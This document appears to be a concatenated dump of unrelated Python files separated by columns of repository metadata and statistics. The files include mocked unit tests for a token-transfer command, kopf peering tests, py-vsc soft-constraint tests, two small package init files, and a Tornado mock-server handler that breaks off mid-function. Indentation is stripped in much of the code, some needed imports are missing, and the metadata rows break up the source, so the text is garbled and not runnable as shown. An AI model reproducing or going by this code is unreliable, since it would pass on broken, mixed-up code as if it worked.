from pocketbook.address_book import AddressBook
from pocketbook.key_store import KeyStore
from pocketbook.utils import create_api
class Person:
def __init__(self, name):
self.name = str(name)
self.entity = Entity()
self.address = Address(self.entity)
class TransferCommandUnitTests(unittest.TestCase):
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('fetchai.ledger.api.token.TokenTxFactory', spec=TokenTxFactory)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_transfer_to_addr_dest(self, MockKeyStore, MockAddressBook, MockTxFactory, mock_create_api, *args):
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = [person1.name]
key_store.load_key.return_value = person1.entity
address_book = MockAddressBook()
address_book.keys.return_value = [person2.name]
address_book.lookup_address.return_value = person2.address
api = MagicMock()
mock_create_api.return_value = api
api.submit_signed_tx.side_effect = ['0xTransactionHexId']
# setup tx and tx factory
tx = MagicMock()
MockTxFactory.transfer.side_effect = [tx]
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = [person1.name]
args.from_address = None
args.network = 'super-duper-net'
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# create api and lookup the addresses from the key store and address book
mock_create_api.assert_called_once_with('super-duper-net')
key_store.load_key.assert_called_once_with(person1.name, 'weak-password')
# expectations for configuring the transaction
MockTxFactory.transfer.assert_called_once_with(Address(person1.address), person2.address, 20000000000, 0,
[person1.entity])
self.assertEqual(tx.charge_rate, 1)
self.assertEqual(tx.charge_limit, 1)
api.set_validity_period.assert_called_once_with(tx)
tx.sign.assert_called_with(person1.entity)
# submission of the transaction
api.submit_signed_tx.assert_called_once_with(tx)
api.sync.assert_called_once_with('0xTransactionHexId')
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('fetchai.ledger.api.token.TokenTxFactory', spec=TokenTxFactory)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_transfer_to_key_dest(self, MockKeyStore, MockAddressBook, MockTxFactory, mock_create_api, *args):
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.side_effect = [[person1.name, person2.name]]
key_store.load_key.side_effect = [person1.entity, person2.entity]
key_store.lookup_address.side_effect = [person2.address]
address_book = MockAddressBook()
address_book.keys.return_value = []
api = MagicMock()
mock_create_api.return_value = api
api.submit_signed_tx.side_effect = ['0xTransactionHexId']
# setup tx and tx factory
tx = MagicMock()
MockTxFactory.transfer.side_effect = [tx]
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 2
args.signers = [person1.name]
args.from_address = None
args.network = 'super-duper-net'
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# create api and lookup the addresses from the key store and address book
mock_create_api.assert_called_once_with('super-duper-net')
key_store.lookup_address.assert_called_once_with(person2.name)
key_store.load_key.assert_called_once_with(person1.name, 'weak-password')
# expectations for configuring the transaction
MockTxFactory.transfer.assert_called_once_with(person1.address, person2.address, 20000000000, 0,
[person1.entity])
self.assertEqual(tx.charge_rate, 2)
self.assertEqual(tx.charge_limit, 1)
api.set_validity_period.assert_called_once_with(tx)
tx.sign.assert_called_with(person1.entity)
# submission of the transaction
api.submit_signed_tx.assert_called_once_with(tx)
api.sync.assert_called_once_with('0xTransactionHexId')
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('fetchai.ledger.api.token.TokenTxFactory', spec=TokenTxFactory)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_transfer_to_new_dest(self, MockKeyStore, MockAddressBook, MockTxFactory, mock_create_api, *args):
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = [person1.name, person2.name]
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = None
address_book = MockAddressBook()
address_book.keys.return_value = []
api = MagicMock()
mock_create_api.return_value = api
api.submit_signed_tx.side_effect = ['0xTransactionHexId']
# setup tx and tx factory
tx = MagicMock()
MockTxFactory.transfer.side_effect = [tx]
args = Mock()
args.destination = str(person2.address)
args.amount = 20000000000
args.charge_rate = 1
args.signers = [person1.name]
args.from_address = None
args.network = 'super-duper-net'
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# create api and lookup the addresses from the key store and address book
mock_create_api.assert_called_once_with('super-duper-net')
key_store.load_key.assert_called_once_with(person1.name, 'weak-password')
# expectations for configuring the transaction
MockTxFactory.transfer.assert_called_once_with(Address(person1.address), person2.address, 20000000000, 0,
[person1.entity])
self.assertEqual(tx.charge_rate, 1)
self.assertEqual(tx.charge_limit, 1)
api.set_validity_period.assert_called_once_with(tx)
tx.sign.assert_called_with(person1.entity)
# submission of the transaction
api.submit_signed_tx.assert_called_once_with(tx)
api.sync.assert_called_once_with('0xTransactionHexId')
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('fetchai.ledger.api.token.TokenTxFactory', spec=TokenTxFactory)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_multisig_transfer(self, MockKeyStore, MockAddressBook, MockTxFactory, mock_create_api, *args):
multisig = Person('MultiSig')
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = [person1.name, person2.name]
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = person2.address
address_book = MockAddressBook()
address_book.keys.return_value = [multisig.name]
address_book.lookup_address.return_value = multisig.address
api = MagicMock()
mock_create_api.return_value = api
api.submit_signed_tx.side_effect = ['0xTransactionHexId']
# setup tx and tx factory
tx = MagicMock()
MockTxFactory.transfer.side_effect = [tx]
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = [person1.name]
args.from_address = multisig.name
args.network = 'super-duper-net'
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# create api and lookup the addresses from the key store and address book
mock_create_api.assert_called_once_with('super-duper-net')
address_book.lookup_address.assert_called_once_with(multisig.name)
key_store.lookup_address.assert_called_once_with(person2.name)
key_store.load_key.assert_called_once_with(person1.name, 'weak-password')
# expectations for configuring the transaction
MockTxFactory.transfer.assert_called_once_with(Address(multisig.address), person2.address, 20000000000, 0,
[person1.entity])
self.assertEqual(tx.charge_rate, 1)
self.assertEqual(tx.charge_limit, 1)
api.set_validity_period.assert_called_once_with(tx)
tx.sign.assert_called_with(person1.entity)
# submission of the transaction
api.submit_signed_tx.assert_called_once_with(tx)
api.sync.assert_called_once_with('0xTransactionHexId')
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('fetchai.ledger.serialisation.transaction.encode_transaction', spec=encode_transaction)
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_error_when_signer_not_present(self, MockKeyStore, MockAddressBook, mock_create_api,
mock_encode_transaction, *args):
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = []
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = person2.address
address_book = MockAddressBook()
address_book.keys.return_value = [person1.name, person2.name]
address_book.lookup_address.return_value = person2.address
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = [person1.name]
args.from_address = person2.name
args.network = 'super-duper-net'
with self.assertRaises(RuntimeError):
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# mock_create_api.assert_called_once_with('super-duper-net')
address_book.lookup_address.assert_called_once_with(person2.name)
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('fetchai.ledger.serialisation.transaction.encode_transaction', spec=encode_transaction)
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_error_when_from_field_is_invalid(self, MockKeyStore, MockAddressBook, mock_create_api,
mock_encode_transaction, *args):
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = [person1.name]
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = person2.address
address_book = MockAddressBook()
address_book.keys.return_value = [person2.name]
address_book.lookup_address.return_value = person2.address
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = [person1.name]
args.from_address = 'some-one-missing'
args.network = 'super-duper-net'
with self.assertRaises(RuntimeError):
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# mock_create_api.assert_called_once_with('super-duper-net')
address_book.lookup_address.assert_called_once_with(person2.name)
@patch('getpass.getpass', side_effect=['weak-password'])
@patch('builtins.input', return_value='')
@patch('fetchai.ledger.serialisation.transaction.encode_transaction', spec=encode_transaction)
@patch('pocketbook.utils.create_api', spec=create_api)
@patch('pocketbook.address_book.AddressBook', spec=AddressBook)
@patch('pocketbook.key_store.KeyStore', spec=KeyStore)
def test_error_case_with_bad_args(self, MockKeyStore, MockAddressBook, mock_create_api, mock_encode_transaction,
*args):
person1 = Person('Jane')
person2 = Person('Clare')
key_store = MockKeyStore()
key_store.list_keys.return_value = [person1.name]
key_store.load_key.side_effect = [person1.entity]
key_store.lookup_address.return_value = person2.address
address_book = MockAddressBook()
address_book.keys.return_value = [person2.name]
address_book.lookup_address.return_value = person2.address
args = Mock()
args.destination = person2.name
args.amount = 20000000000
args.charge_rate = 1
args.signers = []
args.from_address = 'some-one-missing'
args.network = 'super-duper-net'
with self.assertRaises(RuntimeError):
from pocketbook.commands.transfer import run_transfer
run_transfer(args)
# mock_create_api.assert_called_once_with('super-duper-net')
address_book.lookup_address.assert_called_once_with(person2.name)
| 42.737609
| 116
| 0.688724
| 1,694
| 14,659
| 5.706021
| 0.070248
| 0.037244
| 0.054624
| 0.068281
| 0.930788
| 0.927995
| 0.927167
| 0.921995
| 0.915684
| 0.915684
| 0
| 0.020056
| 0.214271
| 14,659
| 342
| 117
| 42.862573
| 0.819153
| 0.058667
| 0
| 0.841699
| 0
| 0
| 0.125408
| 0.070397
| 0
| 0
| 0
| 0
| 0.173745
| 1
| 0.030888
| false
| 0.042471
| 0.057915
| 0
| 0.096525
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc5064a496995bfffd4d6648f0ec6741b39acce1
| 56
|
py
|
Python
|
generatemusic/__init__.py
|
WiktorSa/Music-Generation-with-LSTM-and-.wav-files
|
37b713b5e6193788a7710cc0fac4134efb74fa62
|
[
"MIT"
] | 1
|
2022-03-09T20:13:57.000Z
|
2022-03-09T20:13:57.000Z
|
generatemusic/__init__.py
|
WiktorSa/Music-Generation-with-LSTM-and-.wav-files
|
37b713b5e6193788a7710cc0fac4134efb74fa62
|
[
"MIT"
] | 1
|
2021-10-01T16:20:06.000Z
|
2021-10-01T17:25:30.000Z
|
generatemusic/__init__.py
|
WiktorSa/Music-Generation-with-LSTM-and-.wav-files
|
37b713b5e6193788a7710cc0fac4134efb74fa62
|
[
"MIT"
] | null | null | null |
from generatemusic.generate_music import generate_music
| 28
| 55
| 0.910714
| 7
| 56
| 7
| 0.714286
| 0.530612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 56
| 1
| 56
| 56
| 0.942308
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cc79c2d92ed71d7c48de39d8c84e20f7ecb4a9ef
| 4,604
|
py
|
Python
|
tests/peering/test_apply_peers.py
|
tinyzimmer/kopf
|
74c42a2acdf2a72446d290fa1f27b53ec5d43218
|
[
"MIT"
] | null | null | null |
tests/peering/test_apply_peers.py
|
tinyzimmer/kopf
|
74c42a2acdf2a72446d290fa1f27b53ec5d43218
|
[
"MIT"
] | null | null | null |
tests/peering/test_apply_peers.py
|
tinyzimmer/kopf
|
74c42a2acdf2a72446d290fa1f27b53ec5d43218
|
[
"MIT"
] | null | null | null |
import aiohttp.web
import freezegun
import pytest
from kopf.engines.peering import NAMESPACED_PEERING_RESOURCE, CLUSTER_PEERING_RESOURCE
from kopf.engines.peering import Peer, apply_peers
@pytest.mark.usefixtures('with_both_crds')
@pytest.mark.parametrize('namespace, peering_resource', [
pytest.param('ns', NAMESPACED_PEERING_RESOURCE, id='namespace-scoped'),
pytest.param(None, CLUSTER_PEERING_RESOURCE, id='cluster-scoped'),
])
@freezegun.freeze_time('2020-12-31T23:59:59.123456')
async def test_applying_a_dead_peer_purges_it(
hostname, aresponses, resp_mocker, namespace, peering_resource):
patch_mock = resp_mocker(return_value=aiohttp.web.json_response({}))
url = peering_resource.get_url(name='name0', namespace=namespace)
aresponses.add(hostname, url, 'patch', patch_mock)
peer = Peer(id='id1', name='...', namespace='ns1', lastseen='2020-01-01T00:00:00')
await apply_peers(peers=[peer], name='name0', namespace=namespace)
assert patch_mock.called
patch = await patch_mock.call_args_list[0][0][0].json()
assert set(patch['status']) == {'id1'}
assert patch['status']['id1'] is None
@pytest.mark.usefixtures('with_both_crds')
@pytest.mark.parametrize('namespace, peering_resource', [
pytest.param('ns', NAMESPACED_PEERING_RESOURCE, id='namespace-scoped'),
pytest.param(None, CLUSTER_PEERING_RESOURCE, id='cluster-scoped'),
])
@freezegun.freeze_time('2020-12-31T23:59:59.123456')
async def test_applying_an_alive_peer_stores_it(
hostname, aresponses, resp_mocker, namespace, peering_resource):
patch_mock = resp_mocker(return_value=aiohttp.web.json_response({}))
url = peering_resource.get_url(name='name0', namespace=namespace)
aresponses.add(hostname, url, 'patch', patch_mock)
peer = Peer(id='id1', name='...', namespace='ns1', lastseen='2020-12-31T23:59:59')
await apply_peers(peers=[peer], name='name0', namespace=namespace)
assert patch_mock.called
patch = await patch_mock.call_args_list[0][0][0].json()
assert set(patch['status']) == {'id1'}
assert patch['status']['id1']['namespace'] == 'ns1'
assert patch['status']['id1']['priority'] == 0
assert patch['status']['id1']['lastseen'] == '2020-12-31T23:59:59'
assert patch['status']['id1']['lifetime'] == 60
@pytest.mark.usefixtures('with_both_crds')
@pytest.mark.parametrize('namespace, peering_resource', [
pytest.param('ns', NAMESPACED_PEERING_RESOURCE, id='namespace-scoped'),
pytest.param(None, CLUSTER_PEERING_RESOURCE, id='cluster-scoped'),
])
@pytest.mark.parametrize('lastseen', [
pytest.param('2020-01-01T00:00:00', id='when-dead'),
pytest.param('2020-12-31T23:59:59', id='when-alive'),
])
@freezegun.freeze_time('2020-12-31T23:59:59.123456')
async def test_keepalive(
hostname, aresponses, resp_mocker, namespace, peering_resource, lastseen):
patch_mock = resp_mocker(return_value=aiohttp.web.json_response({}))
url = peering_resource.get_url(name='name0', namespace=namespace)
aresponses.add(hostname, url, 'patch', patch_mock)
peer = Peer(id='id1', name='name0', namespace=namespace, lastseen=lastseen)
await peer.keepalive()
assert patch_mock.called
patch = await patch_mock.call_args_list[0][0][0].json()
assert set(patch['status']) == {'id1'}
assert patch['status']['id1']['namespace'] == namespace
assert patch['status']['id1']['priority'] == 0
assert patch['status']['id1']['lastseen'] == '2020-12-31T23:59:59.123456'
assert patch['status']['id1']['lifetime'] == 60
@pytest.mark.usefixtures('with_both_crds')
@pytest.mark.parametrize('namespace, peering_resource', [
pytest.param('ns', NAMESPACED_PEERING_RESOURCE, id='namespace-scoped'),
pytest.param(None, CLUSTER_PEERING_RESOURCE, id='cluster-scoped'),
])
@pytest.mark.parametrize('lastseen', [
pytest.param('2020-01-01T00:00:00', id='when-dead'),
pytest.param('2020-12-31T23:59:59', id='when-alive'),
])
@freezegun.freeze_time('2020-12-31T23:59:59.123456')
async def test_disappear(
hostname, aresponses, resp_mocker, namespace, peering_resource, lastseen):
patch_mock = resp_mocker(return_value=aiohttp.web.json_response({}))
url = peering_resource.get_url(name='name0', namespace=namespace)
aresponses.add(hostname, url, 'patch', patch_mock)
peer = Peer(id='id1', name='name0', namespace=namespace, lastseen=lastseen)
await peer.disappear()
assert patch_mock.called
patch = await patch_mock.call_args_list[0][0][0].json()
assert set(patch['status']) == {'id1'}
assert patch['status']['id1'] is None
| 42.238532
| 86
| 0.714379
| 609
| 4,604
| 5.228243
| 0.134647
| 0.103643
| 0.061558
| 0.062814
| 0.942211
| 0.921168
| 0.915829
| 0.915829
| 0.915829
| 0.915829
| 0
| 0.0603
| 0.117507
| 4,604
| 108
| 87
| 42.62963
| 0.723357
| 0
| 0
| 0.804598
| 0
| 0
| 0.192876
| 0.028236
| 0
| 0
| 0
| 0
| 0.206897
| 1
| 0
| false
| 0
| 0.057471
| 0
| 0.057471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aee1352949d63c591612a92963e7f67ccafc2e59
| 7,958
|
py
|
Python
|
ve/unit/test_constraint_soft.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 54
|
2020-03-28T17:54:00.000Z
|
2022-03-27T08:53:13.000Z
|
ve/unit/test_constraint_soft.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 124
|
2020-04-10T03:06:03.000Z
|
2022-03-24T18:35:46.000Z
|
ve/unit/test_constraint_soft.py
|
fvutils/py-vsc
|
e30ffae1b750d8182d102b1fe5b1cfdce017a092
|
[
"Apache-2.0"
] | 17
|
2020-04-09T21:47:58.000Z
|
2022-02-23T19:37:37.000Z
|
'''
Created on Mar 21, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
class TestConstraintSoft(VscTestCase):
def test_soft_smoke(self):
@vsc.randobj
class my_cls(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.constraint
def a_lt_b(self):
vsc.soft(self.a < self.b)
self.a > 0
my_i = my_cls()
with my_i.randomize_with() as i:
i.a == i.b
print("a=" + str(my_i.a) + " b=" + str(my_i.b))
self.assertEqual(my_i.a, my_i.b)
# Should be able to respect the soft constraints
with my_i.randomize_with() as i:
i.a != i.b
print("a=" + str(my_i.a) + " b=" + str(my_i.b))
self.assertNotEqual(my_i.a, my_i.b)
self.assertLess(my_i.a, my_i.b)
self.assertGreater(my_i.a, 0)
def test_soft_dist(self):
@vsc.randobj
class my_item(object):
def __init__(self):
self.a = vsc.rand_bit_t(8)
self.b = vsc.rand_bit_t(8)
@vsc.constraint
def valid_ab_c(self):
self.a < self.b
vsc.soft(self.a > 5) #A
@vsc.constraint
def dist_a(self):
vsc.dist(self.a, [
vsc.weight(0, 10),
vsc.weight(1, 100),
vsc.weight(2, 10),
vsc.weight(4, 10),
vsc.weight(8, 10)])
item = my_item()
for i in range(10):
with item.randomize_with(debug=0) as it:
it.b > 10
it.a == 1 #B
def test_soft_dist_priority(self):
"""Ensures that dist constraints take priority over soft constraints"""
@vsc.randobj
class my_item(object):
def __init__(self):
self.a = vsc.rand_bit_t(8)
self.b = vsc.rand_bit_t(8)
@vsc.constraint
def valid_ab_c(self):
self.a < self.b
vsc.soft(self.a > 5) #A
@vsc.constraint
def dist_a(self):
vsc.dist(self.a, [
vsc.weight(0, 10),
vsc.weight(1, 10),
vsc.weight(2, 10),
vsc.weight(4, 10),
vsc.weight(8, 10)])
hist = [0]*9
item = my_item()
for i in range(100):
item.randomize()
hist[item.a] += 1
self.assertGreater(hist[0], 0)
self.assertGreater(hist[1], 0)
self.assertGreater(hist[2], 0)
self.assertGreater(hist[4], 0)
self.assertGreater(hist[8], 0)
def test_compound_array(self):
import vsc
@vsc.randobj
class Parent:
def __init__(self):
self.id = 0
self.c1 = vsc.rand_list_t(vsc.attr(Child1()))
for i in range(10):
self.c1.append(vsc.attr(Child1()))
self.c2 = vsc.rand_list_t(vsc.attr(Child2()))
for i in range(10):
self.c2.append(vsc.attr(Child2()))
@vsc.constraint
def parent_c(self):
self.c1[0].a[1].value == self.c2[0].x[1].value # Multi-level
pass
@vsc.randobj
class Field:
def __init__(self, name, def_value):
self.name = name
self.value = vsc.rand_uint8_t(def_value)
# @vsc.constraint
# def soft_t(self):
# #soft(self.value == 5)
@vsc.randobj
class Child1:
def __init__(self):
self.a = vsc.rand_list_t(vsc.attr(Field('a', 10)))
for i in range(5):
self.a.append(vsc.attr(Field('a', 10)))
self.b = vsc.rand_list_t(vsc.attr(Field('b', 10)))
for i in range(5):
self.b.append(vsc.attr(Field('b', 10)))
@vsc.constraint
def test_c(self):
#self.a[0].value < 7 # Works
vsc.soft(self.a[0].value == 5) # Fails
self.a[0].value < self.a[1].value
@vsc.randobj
class Child2:
def __init__(self):
self.x = vsc.rand_list_t(vsc.attr(Field('x', 10)))
for i in range(5):
self.x.append(vsc.attr(Field('x', 10)))
self.y = vsc.rand_list_t(vsc.attr(Field('y', 10)))
for i in range(5):
self.y.append(vsc.attr(Field('y', 10)))
@vsc.constraint
def test_c(self):
self.x[0].value < self.x[1].value
inst=Parent()
inst.randomize(debug=0)
print("inst.c1[0].a[0].value", inst.c1[0].a[0].value)
self.assertEqual(inst.c1[0].a[0].value, 5)
print("inst.c1[0].a[1].value", inst.c1[0].a[1].value)
# print()
# print("inst.c2[0].x[0].value", inst.c2[0].x[0].value)
# print("inst.c2[0].x[1].value", inst.c2[0].x[1].value)
def test_compound_array_min(self):
import vsc
@vsc.randobj
class Parent:
def __init__(self):
self.id = 0
self.c1 = vsc.rand_list_t(vsc.attr(Child1()))
for i in range(1):
self.c1.append(vsc.attr(Child1()))
self.c2 = vsc.rand_list_t(vsc.attr(Child2()))
for i in range(1):
self.c2.append(vsc.attr(Child2()))
@vsc.constraint
def parent_c(self):
self.c1[0].a[1].value == self.c2[0].x[1].value # Multi-level
pass
@vsc.randobj
class Field:
def __init__(self, name, def_value):
self.name = name
self.value = vsc.rand_uint8_t(def_value)
# @vsc.constraint
# def soft_t(self):
# #soft(self.value == 5)
@vsc.randobj
class Child1:
def __init__(self):
self.a = vsc.rand_list_t(vsc.attr(Field('a', 10)))
for i in range(2):
self.a.append(vsc.attr(Field('a', 10)))
self.b = vsc.rand_list_t(vsc.attr(Field('b', 10)))
for i in range(2):
self.b.append(vsc.attr(Field('b', 10)))
@vsc.constraint
def test_c(self):
#self.a[0].value < 7 # Works
vsc.soft(self.a[0].value == 5) # Fails
self.a[0].value < self.a[1].value
@vsc.randobj
class Child2:
def __init__(self):
self.x = vsc.rand_list_t(vsc.attr(Field('x', 10)))
for i in range(2):
self.x.append(vsc.attr(Field('x', 10)))
self.y = vsc.rand_list_t(vsc.attr(Field('y', 10)))
for i in range(2):
self.y.append(vsc.attr(Field('y', 10)))
@vsc.constraint
def test_c(self):
self.x[0].value < self.x[1].value
inst=Parent()
inst.randomize(debug=0)
print("inst.c1[0].a[0].value", inst.c1[0].a[0].value)
self.assertEqual(inst.c1[0].a[0].value, 5)
print("inst.c1[0].a[1].value", inst.c1[0].a[1].value)
# print()
# print("inst.c2[0].x[0].value", inst.c2[0].x[0].value)
# print("inst.c2[0].x[1].value", inst.c2[0].x[1].value)
| 31.832
| 83
| 0.447223
| 1,030
| 7,958
| 3.318447
| 0.096117
| 0.049152
| 0.056173
| 0.045056
| 0.815097
| 0.807197
| 0.803101
| 0.781451
| 0.772967
| 0.772967
| 0
| 0.04887
| 0.416311
| 7,958
| 250
| 84
| 31.832
| 0.686975
| 0.085574
| 0
| 0.80791
| 0
| 0
| 0.015193
| 0.011602
| 0
| 0
| 0
| 0
| 0.062147
| 1
| 0.152542
| false
| 0.011299
| 0.022599
| 0
| 0.242938
| 0.033898
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9d96172237187ddcf962ef8f9aa5867a793702b3
| 100
|
py
|
Python
|
src/eurocodepy/ec2/sls/__init__.py
|
pcachim/eurocodepy
|
8b68e733e5ccaa41b16135d3a3f8e9d2544fc112
|
[
"MIT"
] | null | null | null |
src/eurocodepy/ec2/sls/__init__.py
|
pcachim/eurocodepy
|
8b68e733e5ccaa41b16135d3a3f8e9d2544fc112
|
[
"MIT"
] | null | null | null |
src/eurocodepy/ec2/sls/__init__.py
|
pcachim/eurocodepy
|
8b68e733e5ccaa41b16135d3a3f8e9d2544fc112
|
[
"MIT"
] | null | null | null |
from .longterm import cemprops
from .longterm import creep_coef
from .longterm import shrink_strain
| 25
| 35
| 0.85
| 14
| 100
| 5.928571
| 0.571429
| 0.433735
| 0.650602
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 100
| 3
| 36
| 33.333333
| 0.943182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9dd9ad553db256f1f9e752a1ae52e7f876e9962f
| 8,008
|
py
|
Python
|
auto/mockserver/apps/main/handlers.py
|
Strugglingrookie/oldboy2
|
8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47
|
[
"Apache-2.0"
] | 1
|
2021-06-15T07:01:23.000Z
|
2021-06-15T07:01:23.000Z
|
auto/mockserver/apps/main/handlers.py
|
Strugglingrookie/oldboy2
|
8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47
|
[
"Apache-2.0"
] | 3
|
2020-02-13T14:35:36.000Z
|
2021-06-10T21:27:14.000Z
|
auto/mockserver/apps/main/handlers.py
|
Strugglingrookie/oldboy2
|
8ed6723cab1f54f2ff8ea0947c6f982aef7e1b47
|
[
"Apache-2.0"
] | 1
|
2020-04-09T02:13:12.000Z
|
2020-04-09T02:13:12.000Z
|
# coding=utf-8
import tornado.web
import tornado.concurrent
import tornado.gen
from concurrent.futures import ThreadPoolExecutor
from dao.main_curd import *
from plugin import logger
import sys, time, json
from tornado.httpclient import HTTPRequest
try:
from tornado.curl_httpclient import CurlAsyncHTTPClient as AsyncHTTPClient
except ImportError:
from tornado.simple_httpclient import SimpleAsyncHTTPClient as AsyncHTTPClient
reload(sys)
sys.setdefaultencoding('utf8')
_result = {}
TIMEOUT = 30
MAX_WORKERS = 50
class BaseHandler(tornado.web.RequestHandler):
executor = ThreadPoolExecutor(max_workers=MAX_WORKERS)
def get_current_user(self):
return self.get_secure_cookie("user")
class IndexHandler(BaseHandler):
def on_response(self, respnose):
if respnose.code!=200:
self.set_status(respnose.code, respnose.error.message)
else:
for k in respnose.headers:
self.set_header(k,respnose.headers.get(k))
self.write(respnose.body)
self.finish()
@tornado.web.asynchronous
def post(self):
try:
req = self.request
protocol = req.protocol
host = req.host
method = req.method
uri = req.uri
urigroups = uri.split('/')
if urigroups[1]=="errorpage":
path =self.get_argument("path")
sc = urigroups[2]
if sc == "404":
reason = "<h1>Not Found</h1><p>The requested URL %s was not found on this server.</p>"%path
else:
reason = "<h1>Internal Server Error</h1>"
self.set_status(int(sc))
self.write(reason)
self.finish()
return
except Exception,e:
self.set_status(500, "Internal Server Error!")
logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
self.finish()
return
try:
headers_o = req.headers
body_o = req.body
remote_ip = req.remote_ip
path = req.path
request_headers = req.headers
request_query = req.arguments
request_body = req.body
serviceName = request_headers.get("downstream-service-id", None)
except Exception,e:
self.set_status(500, "Internal Server Error!")
logger.error(e.message, 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
self.finish()
return
if not serviceName:
self.set_status(500, "The request header resolution failed!")
logger.error("请求头解析失败!", 'line %d (/apps/api/handlers.py)' % (sys._getframe().f_lineno - 2))
self.finish()
return
if not request_body:
request_body = {}
else:
try:
request_body = json.loads(request_body)
except:
request_body = {}
t = {}
for i in request_query:
t.setdefault(i, request_query[i][-1])
request_query = t
responseID, headers = checkMockMatch(serviceName, uri, request_headers, request_query,
request_body)
if responseID:
